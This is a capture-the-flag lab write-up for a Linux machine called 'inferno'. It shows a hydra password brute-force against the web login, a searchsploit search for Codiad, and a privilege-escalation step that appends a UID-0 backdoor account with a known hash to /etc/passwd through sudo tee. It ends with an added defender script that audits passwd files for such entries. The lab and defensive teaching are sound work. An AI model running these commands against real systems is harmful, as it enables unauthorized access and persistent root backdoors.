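Lab Overview
Difficulty: medium. Description: Real-life machine + CTF. The machine is designed to be real-life (maybe not?) and is a good fit for newcomers who are just starting out in penetration testing.
Basic Information
| 🚀 | Local machine | Target machine |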
|---|---|---|
| IP | 10.17.5.121 | 10.10.232.226 |
| OS | kali | linux |
Information Gathering
Port Scanning

Login credentials are required

┌──(leo㉿HACK)-[~/SecLab/inferno]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.232.226 http-get /inferno
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-01 15:01:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-get://10.10.232.226:80/inferno
[STATUS] 1341.00 tries/min, 1341 tries in 00:01h, 14343057 to do in 178:16h, 16 active
[STATUS] 1410.00 tries/min, 4230 tries in 00:03h, 14340168 to do in 169:31h, 16 active

Attack Vector
searchsploit codiad
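Exploitation
You will notice that a cronjob logs you out every minute, so you have to be quick.
Key obtained

Try to log in over SSH

Let's use this to create a privileged user:
Privilege Escalation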
openssl passwd -1 -salt "test" "test"
echo 'test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd
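
A defender-side check for the artifact this step leaves behind, as an added example that is not part of the original writeup: it flags passwd entries with UID 0 other than root, a password hash stored inline instead of in /etc/shadow, an empty password field, or a malformed line. The function name `audit_passwd` and the sample file are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup).
# audit_passwd FILE prints one finding per line in the form "<reason> <user>".
audit_passwd() {
    awk -F: '
        # Skip blank lines and comments.
        /^[ \t]*$/ || /^#/ { next }
        # A well-formed entry has exactly 7 colon-separated fields.
        NF != 7 { print "malformed " $1; next }
        # Any account other than root with UID 0 has full root privileges.
        $3 == 0 && $1 != "root" { print "uid0 " $1 }
        # Field 2 is normally "x" (hash kept in /etc/shadow) or a lock marker.
        # A crypt(3) string starting with "$" means a password set in passwd itself.
        $2 ~ /^\$/ { print "inline-hash " $1 }
        # An empty password field allows login without a password.
        $2 == "" { print "empty-password " $1 }
    ' "$1"
}

# Constructed sample: two ordinary entries plus the line appended in the step above.
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0:root:/root:/bin/bash
EOF
audit_passwd "$sample"
rm -f "$sample"
```

Running `audit_passwd /etc/passwd` on a host applies the same checks to the live file; the `sudo tee` rule that made the append possible is the underlying misconfiguration to remove.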
